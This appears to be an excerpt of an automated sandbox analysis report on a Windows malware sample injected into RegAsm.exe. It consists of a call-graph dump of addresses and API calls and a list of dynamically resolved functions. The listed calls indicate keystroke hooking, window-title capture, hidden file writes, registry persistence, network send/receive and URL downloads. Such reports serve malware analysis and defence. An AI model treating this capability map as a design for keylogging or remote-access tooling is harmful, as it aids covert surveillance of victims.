48554->48556 48559 40b96c 28 API calls 48555->48559 48556->48522 48556->48523 48558->48534 48559->48556 48569 40a2b8 48560->48569 48599 40acd6 48563->48599 48641 40a726 48566->48641 48570 40a2d1 GetModuleHandleA SetWindowsHookExA 48569->48570 48571 40a333 GetMessageA 48569->48571 48570->48571 48573 40a2ed GetLastError 48570->48573 48572 40a345 TranslateMessage DispatchMessageA 48571->48572 48583 40a270 48571->48583 48572->48571 48572->48583 48584 41bb8e 48573->48584 48590 441e81 48584->48590 48587 402093 28 API calls 48588 40a2fe 48587->48588 48589 4052fd 28 API calls 48588->48589 48591 441e8d 48590->48591 48594 441c7d 48591->48594 48593 41bbb2 48593->48587 48595 441c94 48594->48595 48597 441ccb _Atexit 48595->48597 48598 4405dd 20 API calls _Atexit 48595->48598 48597->48593 48598->48597 48628 40ace4 48599->48628 48600 40a292 48601 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 48602 40b904 28 API calls 48601->48602 48602->48628 48607 41bae6 GetTickCount 48607->48628 48608 40ad84 GetWindowTextW 48608->48628 48610 40b8ec 28 API calls 48610->48628 48611 40aedc 48612 401f09 11 API calls 48611->48612 48612->48600 48613 40ae49 Sleep 48613->48628 48614 441e81 20 API calls 48614->48628 48616 402093 28 API calls 48616->48628 48617 40add1 48619 40905c 28 API calls 48617->48619 48617->48628 48637 40b164 31 API calls new 48617->48637 48619->48617 48621 403014 28 API calls 48621->48628 48622 406383 28 API calls 48622->48628 48624 40a636 12 API calls 48624->48628 48625 41bc5e 28 API calls 48625->48628 48626 401f09 11 API calls 48626->48628 48627 401fd8 11 API calls 48627->48628 48628->48600 48628->48601 48628->48607 48628->48608 48628->48610 48628->48611 48628->48613 48628->48614 48628->48616 48628->48617 48628->48621 48628->48622 48628->48624 48628->48625 48628->48626 48628->48627 48629 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48628->48629 48630 401f86 48628->48630 48634 434770 23 API calls __onexit 48628->48634 48635 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48628->48635 48636 409044 28 API calls 48628->48636 48638 40b97c 28 API calls 48628->48638 48639 40b748 40 API calls 2 library calls 48628->48639 48640 4052fd 28 API calls 48628->48640 48631 401f8e 48630->48631 48632 402252 11 API calls 48631->48632 48633 401f99 48632->48633 48633->48628 48634->48628 48635->48628 48636->48628 48637->48617 48638->48628 48639->48628 48642 40a73b Sleep 48641->48642 48662 40a675 48642->48662 48644 40a286 48645 40a77b CreateDirectoryW 48649 40a74d 48645->48649 48646 40a78c GetFileAttributesW 48646->48649 48647 40a7a3 SetFileAttributesW 48647->48649 48649->48642 48649->48644 48649->48646 48649->48647 48651 401e65 22 API calls 48649->48651 48660 40a76f 48649->48660 48675 41c3f1 48649->48675 48650 40a81d PathFileExistsW 48650->48660 48651->48649 48652 4020df 11 API calls 48652->48660 48653 4020b7 28 API calls 48653->48660 48655 40a926 SetFileAttributesW 48655->48649 48656 406dd8 28 API calls 48656->48660 48657 401fe2 28 API calls 48657->48660 48658 401fd8 11 API calls 48658->48660 48660->48645 48660->48650 48660->48652 48660->48653 48660->48655 48660->48656 48660->48657 48660->48658 48661 401fd8 11 API calls 48660->48661 48685 41c485 32 API calls 48660->48685 48686 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48660->48686 48661->48649 48663 40a722 48662->48663 48665 40a68b 48662->48665 48663->48649 48664 40a6aa CreateFileW 48664->48665 48666 40a6b8 GetFileSize 48664->48666 48665->48664 48667 40a6ed CloseHandle 48665->48667 48668 40a6ff 48665->48668 48669 40a6e2 Sleep 48665->48669 48670 40a6db 48665->48670 48666->48665 48666->48667 48667->48665 48668->48663 48672 40905c 28 API calls 48668->48672 48669->48667 48687 40b0dc 84 API calls 48670->48687 48673 40a71b 48672->48673 48674 40a179 124 API calls 48673->48674 48674->48663 48676 41c404 CreateFileW 48675->48676 48678 41c441 48676->48678 48679 41c43d 48676->48679 48680 41c461 WriteFile 48678->48680 48681 41c448 SetFilePointer 48678->48681 48679->48649 48683 41c474 48680->48683 48684 41c476 CloseHandle 48680->48684 48681->48680 48682 41c458 CloseHandle 48681->48682 48682->48679 48683->48684 48684->48679 48685->48660 48686->48660 48687->48669 48690 40322e 48689->48690 48699 403618 48690->48699 48692 40323b 48692->48510 48694 40326e 48693->48694 48695 402252 11 API calls 48694->48695 48696 403288 48695->48696 48697 402336 11 API calls 48696->48697 48698 403031 48697->48698 48698->48054 48700 403626 48699->48700 48701 403644 48700->48701 48702 40362c 48700->48702 48704 40369e 48701->48704 48706 40365c 48701->48706 48710 4036a6 28 API calls 48702->48710 48711 4028a4 22 API calls 48704->48711 48708 4027e6 28 API calls 48706->48708 48709 403642 48706->48709 48708->48709 48709->48692 48710->48709 48713 404186 48712->48713 48714 402252 11 API calls 48713->48714 48715 404191 48714->48715 48723 4041bc 48715->48723 48718 4042fc 48734 404353 48718->48734 48720 40430a 48721 403262 11 API calls 48720->48721 48722 404319 48721->48722 48722->48063 48724 4041c8 48723->48724 48727 4041d9 48724->48727 48726 40419c 48726->48718 48728 4041e9 48727->48728 48729 404206 48728->48729 48730 4041ef 48728->48730 48731 4027e6 28 API calls 48729->48731 48732 404267 28 API calls 48730->48732 48733 404204 48731->48733 48732->48733 48733->48726 48735 40435f 48734->48735 48738 404371 48735->48738 48737 40436d 48737->48720 48739 40437f 48738->48739 48740 404385 48739->48740 48741 40439e 48739->48741 48804 4034e6 28 API calls 48740->48804 48742 402888 22 API calls 48741->48742 48743 4043a6 48742->48743 48745 404419 48743->48745 48746 4043bf 48743->48746 48805 4028a4 22 API calls 48745->48805 48749 4027e6 28 API calls 48746->48749 48757 40439c 48746->48757 48749->48757 48757->48737 48804->48757 48812 43aa9a 48806->48812 48810 4138b9 48809->48810 48811 41388f RegSetValueExA RegCloseKey 48809->48811 48810->48082 48811->48810 48815 43aa1b 48812->48815 48814 40170d 48814->48080 48816 43aa2a 48815->48816 48817 43aa3e 48815->48817 48828 4405dd 20 API calls _Atexit 48816->48828 48820 43aa2f __alldvrm _Atexit 48817->48820 48821 448957 48817->48821 48820->48814 48822 4484ca _Atexit 5 API calls 48821->48822 48823 44897e 48822->48823 48824 448996 GetSystemTimeAsFileTime 48823->48824 48825 44898a 48823->48825 48824->48825 48826 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 48825->48826 48827 4489a7 48826->48827 48827->48820 48828->48820 48832 41b8f9 _Yarn ___scrt_fastfail 48829->48832 48830 402093 28 API calls 48831 414f49 48830->48831 48831->48088 48832->48830 48833->48105 48835 414f02 getaddrinfo WSASetLastError 48834->48835 48836 414ef8 48834->48836 48835->48157 48974 414d86 48836->48974 48840 404846 socket 48839->48840 48841 404839 48839->48841 48842 404860 CreateEventW 48840->48842 48843 404842 48840->48843 49013 40489e WSAStartup 48841->49013 48842->48157 48843->48157 48845 40483e 48845->48840 48845->48843 48847 404f65 48846->48847 48848 404fea 48846->48848 48849 404f6e 48847->48849 48850 404fc0 CreateEventA CreateThread 48847->48850 48851 404f7d GetLocalTime 48847->48851 48848->48157 48849->48850 48850->48848 49015 405150 48850->49015 48852 41bb8e 28 API calls 48851->48852 48853 404f91 48852->48853 49014 4052fd 28 API calls 48853->49014 48862 404a1b 48861->48862 48863 4048ee 48861->48863 48864 40497e 48862->48864 48865 404a21 WSAGetLastError 48862->48865 48863->48864 48866 404923 48863->48866 48868 40531e 28 API calls 48863->48868 48864->48157 48865->48864 48867 404a31 48865->48867 49019 420c60 27 API calls 48866->49019 48869 404932 48867->48869 48870 404a36 48867->48870 48873 40490f 48868->48873 48876 402093 28 API calls 48869->48876 49024 41cae1 30 API calls 48870->49024 48872 40492b 48872->48869 48875 404941 48872->48875 48877 402093 28 API calls 48873->48877 48885 404950 48875->48885 48886 404987 48875->48886 48879 404a80 48876->48879 48880 40491e 48877->48880 48878 404a40 49025 4052fd 28 API calls 48878->49025 48882 402093 28 API calls 48879->48882 48883 41b4ef 80 API calls 48880->48883 48887 404a8f 48882->48887 48883->48866 48891 402093 28 API calls 48885->48891 49021 421a40 54 API calls 48886->49021 48892 41b4ef 80 API calls 48887->48892 48895 40495f 48891->48895 48892->48864 48893 40498f 48896 4049c4 48893->48896 48897 404994 48893->48897 48899 402093 28 API calls 48895->48899 49023 420e06 28 API calls 48896->49023 48900 402093 28 API calls 48897->48900 48902 40496e 48899->48902 48904 4049a3 48900->48904 48905 41b4ef 80 API calls 48902->48905 48907 402093 28 API calls 48904->48907 48908 404973 48905->48908 48906 4049cc 48909 4049f9 CreateEventW CreateEventW 48906->48909 48911 402093 28 API calls 48906->48911 48910 4049b2 48907->48910 49020 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48908->49020 48909->48864 48913 41b4ef 80 API calls 48910->48913 48912 4049e2 48911->48912 48915 402093 28 API calls 48912->48915 48916 4049b7 48913->48916 48917 4049f1 48915->48917 49022 4210b2 52 API calls 48916->49022 48919 41b4ef 80 API calls 48917->48919 48920 4049f6 48919->48920 48920->48909 49026 41b7b6 GlobalMemoryStatusEx 48921->49026 48923 41b7f5 48923->48157 49027 414580 48924->49027 48928 40dda5 48927->48928 48929 4134ff 3 API calls 48928->48929 48931 40ddac 48929->48931 48930 40ddc4 48930->48157 48931->48930 48932 413549 3 API calls 48931->48932 48932->48930 48934 4020b7 28 API calls 48933->48934 48935 41bc57 48934->48935 48935->48157 48937 41bd2b 48936->48937 48938 4020b7 28 API calls 48937->48938 48939 41bd3d 48938->48939 48939->48157 48941 41bafc GetTickCount 48940->48941 48941->48174 48943 436e90 ___scrt_fastfail 48942->48943 48944 41bab5 GetForegroundWindow GetWindowTextW 48943->48944 48945 40417e 28 API calls 48944->48945 48946 41badf 48945->48946 48946->48174 48947->48174 48948->48174 48950 4020df 11 API calls 48949->48950 48951 404c27 48950->48951 48952 4020df 11 API calls 48951->48952 48964 404c30 48952->48964 48953 43bd51 new 21 API calls 48953->48964 48955 404c96 48957 404ca1 48955->48957 48955->48964 48956 4020b7 28 API calls 48956->48964 49069 404e26 99 API calls 48957->49069 48958 401fe2 28 API calls 48958->48964 48960 404ca8 48962 401fd8 11 API calls 48960->48962 48961 401fd8 11 API calls 48961->48964 48963 404cb1 48962->48963 48965 401fd8 11 API calls 48963->48965 48964->48953 48964->48955 48964->48956 48964->48958 48964->48961 49056 404cc3 48964->49056 49068 404b96 57 API calls 48964->49068 48966 404cba 48965->48966 48966->48134 48968->48157 48969->48134 48971->48174 48972->48134 48973->48134 48975 414dc8 GetSystemDirectoryA 48974->48975 48992 414ecf 48974->48992 48976 414de3 48975->48976 48975->48992 48995 441a3e 48976->48995 48978 414dff 49002 441a98 48978->49002 48980 414e0f LoadLibraryA 48981 414e31 GetProcAddress 48980->48981 48982 414e42 48980->48982 48981->48982 48983 414e3d FreeLibrary 48981->48983 48984 441a3e ___std_exception_copy 20 API calls 48982->48984 48993 414e93 48982->48993 48983->48982 48985 414e5e 48984->48985 48986 441a98 20 API calls 48985->48986 48989 414e6e LoadLibraryA 48986->48989 48987 414e99 GetProcAddress 48988 414eb4 FreeLibrary 48987->48988 48987->48993 48990 414eb2 48988->48990 48991 414e82 GetProcAddress 48989->48991 48989->48992 48990->48992 48991->48993 48994 414e8e FreeLibrary 48991->48994 48992->48835 48993->48987 48993->48990 48993->48992 48994->48993 48996 441a59 48995->48996 48997 441a4b 48995->48997 49009 4405dd 20 API calls _Atexit 48996->49009 48997->48996 49000 441a70 48997->49000 48999 441a61 _Atexit 48999->48978 49000->48999 49010 4405dd 20 API calls _Atexit 49000->49010 49003 441ab4 49002->49003 49005 441aa6 49002->49005 49011 4405dd 20 API calls _Atexit 49003->49011 49005->49003 49006 441add 49005->49006 49008 441abc _Atexit 49006->49008 49012 4405dd 20 API calls _Atexit 49006->49012 49008->48980 49009->48999 49010->48999 49011->49008 49012->49008 49013->48845 49018 40515c 102 API calls 49015->49018 49017 405159 49018->49017 49019->48872 49020->48864 49021->48893 49022->48908 49023->48906 49024->48878 49026->48923 49030 414553 49027->49030 49031 414568 ___scrt_initialize_default_local_stdio_options 49030->49031 49034 43f79d 49031->49034 49037 43c4f0 49034->49037 49038 43c530 49037->49038 49039 43c518 49037->49039 49038->49039 49041 43c538 49038->49041 49052 4405dd 20 API calls _Atexit 49039->49052 49042 43a7b7 _strftime 36 API calls 49041->49042 49043 43c548 49042->49043 49053 43cc76 20 API calls 2 library calls 49043->49053 49044 43c51d _Atexit 49046 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 49044->49046 49048 414576 49046->49048 49047 43c5c0 49054 43d2e4 51 API calls 3 library calls 49047->49054 49048->48157 49051 43c5cb 49055 43cce0 20 API calls _free 49051->49055 49052->49044 49053->49047 49054->49051 49055->49044 49057 4020df 11 API calls 49056->49057 49066 404cde 49057->49066 49058 404e13 49059 401fd8 11 API calls 49058->49059 49060 404e1c 49059->49060 49060->48955 49061 4041a2 28 API calls 49061->49066 49062 401fe2 28 API calls 49062->49066 49063 401fc0 28 API calls 49065 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 49063->49065 49064 4020f6 28 API calls 49064->49066 49065->49066 49070 415aea 49065->49070 49066->49058 49066->49061 49066->49062 49066->49063 49066->49064 49067 401fd8 11 API calls 49066->49067 49067->49066 49068->48964 49069->48960 49071 4020f6 28 API calls 49070->49071 49072 415b0c SetEvent 49071->49072 49073 415b21 49072->49073 49074 4041a2 28 API calls 49073->49074 49075 415b3b 49074->49075 49076 4020f6 28 API calls 49075->49076 49077 415b4b 49076->49077 49078 4020f6 28 API calls 49077->49078 49079 415b5d 49078->49079 49080 41be1b 28 API calls 49079->49080 49081 415b66 49080->49081 49082 417089 49081->49082 49083 415b86 GetTickCount 49081->49083 49084 415d2f 49081->49084 49085 401e8d 11 API calls 49082->49085 49086 41bb8e 28 API calls 49083->49086 49084->49082 49147 415ce5 49084->49147 49087 417092 49085->49087 49088 415b97 49086->49088 49090 401fd8 11 API calls 49087->49090 49091 41bae6 GetTickCount 49088->49091 49092 41709e 49090->49092 49093 415ba3 49091->49093 49094 401fd8 11 API calls 49092->49094 49095 41bb8e 28 API calls 49093->49095 49096 4170aa 49094->49096 49097 415bae 49095->49097 49098 41ba96 30 API calls 49097->49098 49099 415bbc 49098->49099 49100 41bd1e 28 API calls 49099->49100 49101 415bca 49100->49101 49102 401e65 22 API calls 49101->49102 49103 415bd8 49102->49103 49149 402f31 28 API calls 49103->49149 49105 415be6 49150 402ea1 28 API calls 49105->49150 49107 415bf5 49108 402f10 28 API calls 49107->49108 49109 415c04 49108->49109 49151 402ea1 28 API calls 49109->49151 49111 415c13 49112 402f10 28 API calls 49111->49112 49113 415c1f 49112->49113 49152 402ea1 28 API calls 49113->49152 49115 415c29 49153 404aa1 61 API calls _Yarn 49115->49153 49117 415c38 49118 401fd8 11 API calls 49117->49118 49119 415c41 49118->49119 49120 401fd8 11 API calls 49119->49120 49121 415c4d 49120->49121 49122 401fd8 11 API calls 49121->49122 49123 415c59 49122->49123 49124 401fd8 11 API calls 49123->49124 49125 415c65 49124->49125 49126 401fd8 11 API calls 49125->49126 49127 415c71 49126->49127 49128 401fd8 11 API calls 49127->49128 49129 415c7d 49128->49129 49130 401f09 11 API calls 49129->49130 49131 415c86 49130->49131 49132 401fd8 11 API calls 49131->49132 49133 415c8f 49132->49133 49134 401fd8 11 API calls 49133->49134 49135 415c98 49134->49135 49136 401e65 22 API calls 49135->49136 49137 415ca3 49136->49137 49138 43baac _strftime 40 API calls 49137->49138 49139 415cb0 49138->49139 49140 415cb5 49139->49140 49141 415cdb 49139->49141 49143 415cc3 49140->49143 49144 415cce 49140->49144 49142 401e65 22 API calls 49141->49142 49142->49147 49154 404ff4 82 API calls 49143->49154 49146 404f51 105 API calls 49144->49146 49148 415cc9 49146->49148 49147->49082 49155 4050e4 84 API calls 49147->49155 49148->49082 49149->49105 49150->49107 49151->49111 49152->49115 49153->49117 49154->49148 49155->49148 49157->48207 49158->48234 49159->48233 49160->48222 49161->48226 49162->48232 49163->48265 49168 40f7c2 49166->49168 49167 413549 3 API calls 49167->49168 49168->49167 49169 40f866 49168->49169 49171 40f856 Sleep 49168->49171 49188 40f7f4 49168->49188 49172 40905c 28 API calls 49169->49172 49170 40905c 28 API calls 49170->49188 49171->49168 49173 40f871 49172->49173 49176 41bc5e 28 API calls 49173->49176 49175 41bc5e 28 API calls 49175->49188 49177 40f87d 49176->49177 49201 413814 14 API calls 49177->49201 49180 401f09 11 API calls 49180->49188 49181 40f890 49182 401f09 11 API calls 49181->49182 49184 40f89c 49182->49184 49183 402093 28 API calls 49183->49188 49185 402093 28 API calls 49184->49185 49186 40f8ad 49185->49186 49189 41376f 14 API calls 49186->49189 49187 41376f 14 API calls 49187->49188 49188->49170 49188->49171 49188->49175 49188->49180 49188->49183 49188->49187 49199 40d096 112 API calls ___scrt_fastfail 49188->49199 49200 413814 14 API calls 49188->49200 49190 40f8c0 49189->49190 49202 412850 TerminateProcess WaitForSingleObject 49190->49202 49192 40f8c8 ExitProcess 49203 4127ee 62 API calls 49196->49203 49200->49188 49201->49181 49202->49192 49204 4269e6 49205 4269fb 49204->49205 49216 426a8d 49204->49216 49206 426b44 49205->49206 49207 426abd 49205->49207 49208 426b1d 49205->49208 49211 426af2 49205->49211 49212 426a48 49205->49212 49205->49216 49218 426a7d 49205->49218 49232 424edd 49 API calls _Yarn 49205->49232 49206->49216 49237 426155 28 API calls 49206->49237 49207->49211 49207->49216 49235 41fb6c 52 API calls 49207->49235 49208->49206 49208->49216 49220 425ae1 49208->49220 49211->49208 49236 4256f0 21 API calls 49211->49236 49212->49216 49212->49218 49233 41fb6c 52 API calls 49212->49233 49218->49207 49218->49216 49234 424edd 49 API calls _Yarn 49218->49234 49221 425b00 ___scrt_fastfail 49220->49221 49223 425b0f 49221->49223 49226 425b34 49221->49226 49238 41ebbb 21 API calls 49221->49238 49223->49226 49231 425b14 49223->49231 49239 4205d8 46 API calls 49223->49239 49226->49206 49227 425b1d 49227->49226 49242 424d05 21 API calls 2 library calls 49227->49242 49229 425bb7 49229->49226 49240 432ec4 21 API calls new 49229->49240 49231->49226 49231->49227 49241 41da5f 49 API calls 49231->49241 49232->49212 49233->49212 49234->49207 49235->49207 49236->49208 49237->49216 49238->49223 49239->49229 49240->49231 49241->49227 49242->49226 49243 434875 49248 434b47 SetUnhandledExceptionFilter 49243->49248 49245 43487a pre_c_initialization 49249 44554b 20 API calls 2 library calls 49245->49249 49247 434885 49248->49245 49249->49247 49250 415d06 49265 41b380 49250->49265 49252 415d0f 49253 4020f6 28 API calls 49252->49253 49254 415d1e 49253->49254 49276 404aa1 61 API calls _Yarn 49254->49276 49256 415d2a 49257 417089 49256->49257 49258 401fd8 11 API calls 49256->49258 49259 401e8d 11 API calls 49257->49259 49258->49257 49260 417092 49259->49260 49261 401fd8 11 API calls 49260->49261 49262 41709e 49261->49262 49263 401fd8 11 API calls 49262->49263 49264 4170aa 49263->49264 49266 4020df 11 API calls 49265->49266 49267 41b38e 49266->49267 49268 43bd51 new 21 API calls 49267->49268 49269 41b39e InternetOpenW InternetOpenUrlW 49268->49269 49270 41b3c5 InternetReadFile 49269->49270 49274 41b3e8 49270->49274 49271 4020b7 28 API calls 49271->49274 49272 41b415 InternetCloseHandle InternetCloseHandle 49273 41b427 49272->49273 49273->49252 49274->49270 49274->49271 49274->49272 49275 401fd8 11 API calls 49274->49275 49275->49274 49276->49256 49277 426c4b 49282 426cc8 send 49277->49282 49283 44831e 49291 448710 49283->49291 49286 448332 49288 44833a 49289 448347 49288->49289 49299 44834a 11 API calls 49288->49299 49292 4484ca _Atexit 5 API calls 49291->49292 49293 448737 49292->49293 49294 44874f TlsAlloc 49293->49294 49295 448740 49293->49295 49294->49295 49296 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 49295->49296 49297 448328 49296->49297 49297->49286 49298 448299 20 API calls 3 library calls 49297->49298 49298->49288 49299->49286 49300 43be58 49302 43be64 _swprintf ___DestructExceptionObject 49300->49302 49301 43be72 49316 4405dd 20 API calls _Atexit 49301->49316 49302->49301 49304 43be9c 49302->49304 49311 445888 EnterCriticalSection 49304->49311 49306 43be77 ___DestructExceptionObject _Atexit 49307 43bea7 49312 43bf48 49307->49312 49311->49307 49313 43bf56 49312->49313 49315 43beb2 49313->49315 49318 44976c 37 API calls 2 library calls 49313->49318 49317 43becf LeaveCriticalSection std::_Lockit::~_Lockit 49315->49317 49316->49306 49317->49306 49318->49313 49319 41dfbd 49320 41dfd2 _Yarn ___scrt_fastfail 49319->49320 49332 41e1d5 49320->49332 49338 432ec4 21 API calls new 49320->49338 49323 41e1e6 49324 41e189 49323->49324 49334 432ec4 21 API calls new 49323->49334 49326 41e182 ___scrt_fastfail 49326->49324 49339 432ec4 21 API calls new 49326->49339 49328 41e21f ___scrt_fastfail 49328->49324 49335 43354a 49328->49335 49330 41e1af ___scrt_fastfail 49330->49324 49340 432ec4 21 API calls new 49330->49340 49332->49324 49333 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 49332->49333 49333->49323 49334->49328 49341 433469 49335->49341 49337 433552 49337->49324 49338->49326 49339->49330 49340->49332 49342 433482 49341->49342 49343 433478 49341->49343 49342->49343 49347 432ec4 21 API calls new 49342->49347 49343->49337 49345 4334a3 49345->49343 49348 433837 CryptAcquireContextA 49345->49348 49347->49345 49349 433858 CryptGenRandom 49348->49349 49350 433853 49348->49350 49349->49350 49351 43386d CryptReleaseContext 49349->49351 49350->49343 49351->49350 49352 40165e 49353 401666 49352->49353 49355 401669 49352->49355 49354 4016a8 49356 4344ea new 22 API calls 49354->49356 49355->49354 49357 401696 49355->49357 49358 40169c 49356->49358 49359 4344ea new 22 API calls 49357->49359 49359->49358 49360 426bdc 49366 426cb1 recv 49360->49366 49367 42f8ed 49368 42f8f8 49367->49368 49369 42f90c 49368->49369 49371 432eee 49368->49371 49372 432ef9 49371->49372 49373 432efd 49371->49373 49372->49369 49375 440f0d 49373->49375 49376 446185 49375->49376 49377 446192 49376->49377 49378 44619d 49376->49378 49380 446137 ___crtLCMapStringA 21 API calls 49377->49380 49379 4461a5 49378->49379 49386 4461ae ___crtLCMapStringA 49378->49386 49388 446782 20 API calls _free 49379->49388 49384 44619a 49380->49384 49382 4461b3 49389 4405dd 20 API calls _Atexit 49382->49389 49383 4461d8 RtlReAllocateHeap 49383->49384 49383->49386 49384->49372 49386->49382 49386->49383 49390 442f80 7 API calls 2 library calls 49386->49390 49388->49384 49389->49384 49390->49386

                    Executed Functions

                    Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                    • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                    • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                    • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                    • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                    • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                    • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                    • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                    • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                    • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                    • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                    • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                    • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                    • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad$HandleModule
                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                    • API String ID: 4236061018-3687161714
                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                    Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
